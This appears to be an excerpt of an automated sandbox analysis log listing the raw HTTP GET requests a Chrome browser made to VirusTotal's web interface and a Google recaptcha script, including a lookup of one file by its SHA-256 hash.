          Source: global trafficHTTP traffic detected: GET /gui/vt-ui-shell-extra-deps.dd2c31d5f5a0bc61bbe0.js HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.291708482.1714074916; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074915.0.0.0
          Source: global trafficHTTP traffic detected: GET /gui/76703.305a02d74b372f34e459.js HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.291708482.1714074916; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074915.0.0.0
          Source: global trafficHTTP traffic detected: GET /ui/cookie_disclaimer HTTP/1.1Host: www.virustotal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.291708482.1714074916; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074915.0.0.0
          Source: global trafficHTTP traffic detected: GET /ui/user_notifications HTTP/1.1Host: www.virustotal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.291708482.1714074916; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074915.0.0.0
          Source: global trafficHTTP traffic detected: GET /gui/45518.056c1f55be49c167cf84.js HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.291708482.1714074916; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074915.0.0.0
          Source: global trafficHTTP traffic detected: GET /gui/9013.46aa6f2a33218f146fc9.js HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074915.0.0.0; _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1
          Source: global trafficHTTP traffic detected: GET /gui/vt-ui-sw-installer.c228b2b19bd8517cfe55.js HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074915.0.0.0; _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1
          Source: global trafficHTTP traffic detected: GET /gui/static/qrcode.min.js HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074915.0.0.0; _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1
          Source: global trafficHTTP traffic detected: GET /js/bg/lkTXq49YG5_ej1w7m4T9Nw_1Lx1Ocd1gteWQpsfV_Tk.js HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://recaptcha.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /gui/manifest.json HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: manifestReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /gui/images/favicon.svg HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /gui/static/opensearch.xml HTTP/1.1Host: www.virustotal.comConnection: keep-aliveSec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /gui/service-worker.js HTTP/1.1Host: www.virustotal.comConnection: keep-aliveCache-Control: max-age=0Accept: */*Service-Worker: scriptSec-Fetch-Site: same-originSec-Fetch-Mode: same-originSec-Fetch-Dest: serviceworkerReferer: https://www.virustotal.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /gui/images/manifest/icon-192x192.png HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /gui/images/favicon.svg HTTP/1.1Host: www.virustotal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /gui/images/manifest/icon-192x192.png HTTP/1.1Host: www.virustotal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /gui/sha256.worker.d774f311f4702f912904.worker.js HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: same-originSec-Fetch-Dest: workerReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358 HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"x-app-version: v1x259x2X-Tool: vt-ui-mainsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36content-type: application/jsonaccept: application/jsonAccept-Ianguage: en-US,en;q=0.9,es;q=0.8X-VT-Anti-Abuse-Header: MTE2NjAxODYxNzItWkc5dWRDQmlaU0JsZG1scy0xNzE0MDc0OTIzLjg1NQ==sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /ui/files/submission/challenge HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"x-app-version: v1x259x2X-Tool: vt-ui-mainsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36content-type: application/jsonaccept: application/jsonCache-Control: no-cacheAccept-Ianguage: en-US,en;q=0.9,es;q=0.8X-VT-Anti-Abuse-Header: MTEzODg2Mjk3MDQtWkc5dWRDQmlaU0JsZG1scy0xNzE0MDc0OTI0LjYyNg==sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /gui/2766.83fc8c19511961389f7a.js HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /gui/27604.cc72e42e5e25c872f1f7.js HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /gui/54383.6935deb0ecf100e5b899.js HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358 HTTP/1.1Host: www.virustotal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /gui/86082.7555cf018c5a216147a4.js HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /gui/76885.abe51894b146687778f7.js HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /gui/63334.fa0abcaaac3e415ca2c7.js HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /gui/50361.77111c62cbde58b54cb1.js HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /gui/82353.cb048b4e709c7dfeabf5.js HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /ui/files/submission/challenge HTTP/1.1Host: www.virustotal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /gui/25701.8d6eda00aa53bf2b91bb.js HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /gui/98738.02d0b9fc2f580f85da17.js HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /gui/94571.68f95a2c314991f05e3e.js HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /gui/53486.ad811c674149540522ec.js HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /gui/76491.7dc0284cb3a5a45a07f9.js HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /gui/65524.4523ddf7cb1bdb5a39f0.js HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /gui/55164.0738a891fce6393c9b5c.js HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /gui/40384.0c04b76e636824f67499.js HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
